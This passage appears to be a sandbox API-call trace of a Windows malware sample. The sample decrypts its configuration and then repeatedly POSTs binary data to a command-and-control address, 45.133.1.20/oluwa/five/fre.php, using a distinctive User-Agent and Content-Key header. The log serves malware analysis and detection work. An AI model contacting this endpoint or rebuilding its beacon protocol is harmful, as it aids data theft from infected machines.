lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0295.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.778] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0295.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.779] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0295.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.781] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0295.781] GetProcessHeap () returned 0x6a0000 [0295.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0295.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.782] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.783] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.785] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.786] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.786] GetProcessHeap () returned 0x6a0000 [0295.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0295.786] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.787] GetProcessHeap () returned 0x6a0000 [0295.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0295.787] GetProcessHeap () returned 0x6a0000 [0295.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0295.788] GetProcessHeap () returned 0x6a0000 [0295.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0295.789] GetProcessHeap () returned 0x6a0000 [0295.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0295.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.790] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.797] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0295.805] GetProcessHeap () returned 0x6a0000 [0295.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0295.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.806] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0295.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.807] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.808] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.808] GetProcessHeap () returned 0x6a0000 [0295.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0295.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.818] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0295.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.819] CryptDestroyKey (hKey=0x6ad020) returned 1 [0295.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.823] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0295.823] GetProcessHeap () returned 0x6a0000 [0295.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0295.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.824] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0295.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.825] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0295.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.826] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0295.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.827] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0295.827] GetProcessHeap () returned 0x6a0000 [0295.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0295.827] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0295.827] GetProcessHeap () returned 0x6a0000 [0295.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0295.828] socket (af=2, type=1, protocol=6) returned 0xb10 [0295.828] connect (s=0xb10, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0295.849] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0295.849] GetProcessHeap () returned 0x6a0000 [0295.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0295.849] GetProcessHeap () returned 0x6a0000 [0295.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0295.850] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0295.852] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0295.852] GetProcessHeap () returned 0x6a0000 [0295.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da708 [0295.852] GetProcessHeap () returned 0x6a0000 [0295.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0295.852] GetProcessHeap () returned 0x6a0000 [0295.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0295.852] GetProcessHeap () returned 0x6a0000 [0295.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0295.855] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0295.856] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0295.856] GetProcessHeap () returned 0x6a0000 [0295.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0295.856] GetProcessHeap () returned 0x6a0000 [0295.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0295.857] send (s=0xb10, buf=0x6bd460*, len=242, flags=0) returned 242 [0295.858] send (s=0xb10, buf=0x6bb998*, len=159, flags=0) returned 159 [0295.858] GetProcessHeap () returned 0x6a0000 [0295.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0295.858] recv (in: s=0xb10, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0295.933] GetProcessHeap () returned 0x6a0000 [0295.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0295.934] GetProcessHeap () returned 0x6a0000 [0295.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0295.934] GetProcessHeap () returned 0x6a0000 [0295.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da708 | out: hHeap=0x6a0000) returned 1 [0295.934] GetProcessHeap () returned 0x6a0000 [0295.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0295.935] closesocket (s=0xb10) returned 0 [0295.935] GetProcessHeap () returned 0x6a0000 [0295.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0295.935] GetProcessHeap () returned 0x6a0000 [0295.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0295.936] GetProcessHeap () returned 0x6a0000 [0295.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0295.936] GetProcessHeap () returned 0x6a0000 [0295.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0295.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1830) returned 0xb10 [0295.939] Sleep (dwMilliseconds=0xea60) [0295.941] GetProcessHeap () returned 0x6a0000 [0295.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0295.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.944] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.953] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0295.964] GetProcessHeap () returned 0x6a0000 [0295.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0295.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.971] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0295.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.972] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.974] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.974] GetProcessHeap () returned 0x6a0000 [0295.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0295.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.978] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0295.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.980] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0295.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.981] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0295.981] GetProcessHeap () returned 0x6a0000 [0295.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0295.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.982] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.984] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.985] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.989] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.989] GetProcessHeap () returned 0x6a0000 [0295.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0295.989] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.989] GetProcessHeap () returned 0x6a0000 [0295.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0295.990] GetProcessHeap () returned 0x6a0000 [0295.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0295.990] GetProcessHeap () returned 0x6a0000 [0295.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0295.990] GetProcessHeap () returned 0x6a0000 [0295.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0295.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.991] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.999] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0296.006] GetProcessHeap () returned 0x6a0000 [0296.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0296.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.011] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0296.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.012] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.013] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.013] GetProcessHeap () returned 0x6a0000 [0296.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0296.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.016] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0296.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.040] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0296.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.042] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0296.042] GetProcessHeap () returned 0x6a0000 [0296.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0296.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.043] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0296.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.045] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0296.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.046] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0296.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.048] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0296.048] GetProcessHeap () returned 0x6a0000 [0296.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0296.067] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0296.067] GetProcessHeap () returned 0x6a0000 [0296.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0296.067] socket (af=2, type=1, protocol=6) returned 0xb14 [0296.068] connect (s=0xb14, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0296.099] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0296.099] GetProcessHeap () returned 0x6a0000 [0296.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0296.099] GetProcessHeap () returned 0x6a0000 [0296.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0296.100] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0296.101] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0296.101] GetProcessHeap () returned 0x6a0000 [0296.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dac48 [0296.101] GetProcessHeap () returned 0x6a0000 [0296.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0296.102] GetProcessHeap () returned 0x6a0000 [0296.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0296.102] GetProcessHeap () returned 0x6a0000 [0296.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0296.103] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0296.104] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0296.104] GetProcessHeap () returned 0x6a0000 [0296.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0296.104] GetProcessHeap () returned 0x6a0000 [0296.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0296.112] send (s=0xb14, buf=0x6bd460*, len=242, flags=0) returned 242 [0296.113] send (s=0xb14, buf=0x6bb998*, len=159, flags=0) returned 159 [0296.113] GetProcessHeap () returned 0x6a0000 [0296.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0296.113] recv (in: s=0xb14, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0296.185] GetProcessHeap () returned 0x6a0000 [0296.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0296.187] GetProcessHeap () returned 0x6a0000 [0296.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0296.187] GetProcessHeap () returned 0x6a0000 [0296.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dac48 | out: hHeap=0x6a0000) returned 1 [0296.188] GetProcessHeap () returned 0x6a0000 [0296.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0296.188] closesocket (s=0xb14) returned 0 [0296.189] GetProcessHeap () returned 0x6a0000 [0296.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0296.189] GetProcessHeap () returned 0x6a0000 [0296.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0296.189] GetProcessHeap () returned 0x6a0000 [0296.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0296.190] GetProcessHeap () returned 0x6a0000 [0296.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0296.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1834) returned 0xb14 [0296.193] Sleep (dwMilliseconds=0xea60) [0296.195] GetProcessHeap () returned 0x6a0000 [0296.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0296.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.197] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0296.224] GetProcessHeap () returned 0x6a0000 [0296.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0296.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.238] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0296.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.240] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.243] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.243] GetProcessHeap () returned 0x6a0000 [0296.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0296.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.246] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0296.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.248] CryptDestroyKey (hKey=0x6ad020) returned 1 [0296.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0296.249] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0296.249] GetProcessHeap () returned 0x6a0000 [0296.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0296.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0296.250] StrStrA 